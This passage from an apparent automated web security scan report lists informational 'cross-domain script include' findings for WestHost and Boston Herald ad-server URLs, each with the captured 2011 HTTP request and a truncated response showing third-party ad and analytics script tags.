Content-Type: text/html; charset=UTF-8
Content-Length: 10815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>File Not Found - WestHost</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<me
...[SNIP]...
</script>

<script src="http://static.getclicky.com/56585.js" type="text/ javascript"></script>
...[SNIP]...

18.60. http://members.westhost.com/v2/images/v1_checkbox.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://members.westhost.com
Path:   /v2/images/v1_checkbox.gif

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /v2/images/v1_checkbox.gif HTTP/1.1
Host: members.westhost.com
Proxy-Connection: keep-alive
Referer: http://members.westhost.com/v2/sm_sa_email_imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:42:47 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 10815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>File Not Found - WestHost</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<me
...[SNIP]...
</script>

<script src="http://static.getclicky.com/56585.js" type="text/ javascript"></script>
...[SNIP]...

18.61. http://members.westhost.com/v2/menu_settings_members.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://members.westhost.com
Path:   /v2/menu_settings_members.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /v2/menu_settings_members.js HTTP/1.1
Host: members.westhost.com
Proxy-Connection: keep-alive
Referer: http://members.westhost.com/v2/sm_sa_email_imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:42:45 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 10815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>File Not Found - WestHost</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<me
...[SNIP]...
</script>

<script src="http://static.getclicky.com/56585.js" type="text/ javascript"></script>
...[SNIP]...

18.62. http://members.westhost.com/v2/menu_styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://members.westhost.com
Path:   /v2/menu_styles.css

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /v2/menu_styles.css HTTP/1.1
Host: members.westhost.com
Proxy-Connection: keep-alive
Referer: http://members.westhost.com/v2/sm_sa_email_imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:42:45 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 10815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>File Not Found - WestHost</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<me
...[SNIP]...
</script>

<script src="http://static.getclicky.com/56585.js" type="text/ javascript"></script>
...[SNIP]...

18.63. http://members.westhost.com/v2/scripts/cbrowser_dom.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://members.westhost.com
Path:   /v2/scripts/cbrowser_dom.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /v2/scripts/cbrowser_dom.js HTTP/1.1
Host: members.westhost.com
Proxy-Connection: keep-alive
Referer: http://members.westhost.com/v2/sm_sa_email_imap.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:42:46 GMT
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 10815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>File Not Found - WestHost</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<me
...[SNIP]...
</script>

<script src="http://static.getclicky.com/56585.js" type="text/ javascript"></script>
...[SNIP]...

18.64. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/admtmz/ros/300x250/jx/ss/a/1290982822@x15  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/admtmz/ros/300x250/jx/ss/a/1290982822@x15

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/admtmz/ros/300x250/jx/ss/a/1290982822@x15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/passback/iframe/221/tmz/300x250/6/meld.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:57:12 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 106
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0445525d5f4f58455e445a4a423660;expires=Sat, 17-Sep-2011 00:58:12 GMT;path=/;httponly

document.write (' <script src="http://tag.admeld.com/passback/js/221/tmz/300x250/28/meld.js"></script>');

18.65. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/admtmz/ros/728x90/jx/ss/a/1708544459@Top1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/admtmz/ros/728x90/jx/ss/a/1708544459@Top1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/admtmz/ros/728x90/jx/ss/a/1708544459@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/passback/iframe/221/tmz/728x90/6/meld.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:57:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 104
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Sat, 17-Sep-2011 00:58:07 GMT;path=/;httponly

document.write ('<script src="http://tag.admeld.com/passback/js/221/tmz/728x90/28/meld.js"></script>');

18.66. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com//your_tax_dollars_at_work@Top,Bottom!Bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com//your_tax_dollars_at_work@Top,Bottom!Bottom

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com//your_tax_dollars_at_work@Top,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Bottom&page=bh.heraldinteractive.com%2F/your_tax_dollars_at_work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.29.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:05:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_728x90_ROS | http://www.bostonherald.com/ | 728 x 90 Leaderboard -->\n');
document.write ('<script type="text/javascript">\n');
docume
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.67. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com//your_tax_dollars_at_work@Top,Bottom!Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com//your_tax_dollars_at_work@Top,Bottom!Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com//your_tax_dollars_at_work@Top,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Bottom&page=bh.heraldinteractive.com%2F/your_tax_dollars_at_work
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.29.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:05:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_728X90_ATF | http://www.bostonherald.com/ | 728 x 90 Leaderboard -->\n');
document.write ('<script type="text/javascript">\n');
docume
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.68. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/entertainment/home@Top,Middle,Middle1,Bottom!Bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/entertainment/home@Top,Middle,Middle1,Bottom!Bottom

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/entertainment/home@Top,Middle,Middle1,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fentertainment%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.27.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:04:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_728x90_ROS | http://www.bostonherald.com/ | 728 x 90 Leaderboard -->\n');
document.write ('<script type="text/javascript">\n');
docume
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.69. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/entertainment/home@Top,Middle,Middle1,Bottom!Middle1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/entertainment/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/entertainment/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fentertainment%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.27.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:04:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_300x250_ROS | http://www.bostonherald.com/ | 300 x 250 Sidekick -->\n');
document.write ('<script type="text/javascript">\n');
documen
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.70. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/entertainment/home@Top,Middle,Middle1,Bottom!Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/entertainment/home@Top,Middle,Middle1,Bottom!Top

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/entertainment/home@Top,Middle,Middle1,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fentertainment%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.27.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:04:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 600
Content-Type: application/x-javascript

document.write ('<!-- PubMatic ad tag (Javascript) : BostonHerald_728X90_ATF | http://www.bostonherald.com/ | 728 x 90 Leaderboard -->\n');
document.write ('<script type="text/javascript">\n');
docume
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">\n');
document.write (' </script>
...[SNIP]...

18.71. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1321816395@x12  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1321816395@x12

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1321816395@x12 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/view.bg?articleid=1366388
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.44.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:08:25 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 479
Content-Type: application/x-javascript

document.write ('<script src="http://admax.nexage.com/js/admax/admax_api.js"></script>\n');
document.write ('<script>\n');
document.write ('var admax_vars = {\n');
document.write ('dcn: "84ecae28e8a54
...[SNIP]...

18.72. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1359771821@x12  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1359771821@x12

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1359771821@x12 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.42.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:07:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 479
Content-Type: application/x-javascript

document.write ('<script src="http://admax.nexage.com/js/admax/admax_api.js"></script>\n');
document.write ('<script>\n');
document.write ('var admax_vars = {\n');
document.write ('dcn: "84ecae28e8a54
...[SNIP]...

18.73. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1779944804@x11  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1779944804@x11

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1779944804@x11 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/view.bg?articleid=1366388
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.44.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:08:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 479
Content-Type: application/x-javascript

document.write ('<script src="http://admax.nexage.com/js/admax/admax_api.js"></script>\n');
document.write ('<script>\n');
document.write ('var admax_vars = {\n');
document.write ('dcn: "84ecae28e8a54
...[SNIP]...

18.74. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1969994821@x11  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1969994821@x11

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1969994821@x11 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.42.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:07:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 479
Content-Type: application/x-javascript

document.write ('<script src="http://admax.nexage.com/js/admax/admax_api.js"></script>\n');
document.write ('<script>\n');
document.write ('var admax_vars = {\n');
document.write ('dcn: "84ecae28e8a54
...[SNIP]...

18.75. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fcolumnists%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.6.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO201yed8|O1021J78|O1021J7A|O1021J7F|O10226Kk

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:01:03 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R4jGHO201yed8|O2021J78|O2021J7A|O1021J7F|O10226Kk; expires=Tue, 17-Sep-13 01:01:03 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1540
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/news;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/columnists/article/L48/528520205/Middle/BostonHerald/quadrant1_newsROS300x250a_2010/quadrant1_newsROS300x250a_0608.html/4d686437616b35776e72734144666853?;ord=528520205?" type="text/javascript"></script>
...[SNIP]...

18.76. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle1  previous  next

Summary

Severity:   Information
Confidence:   Certain
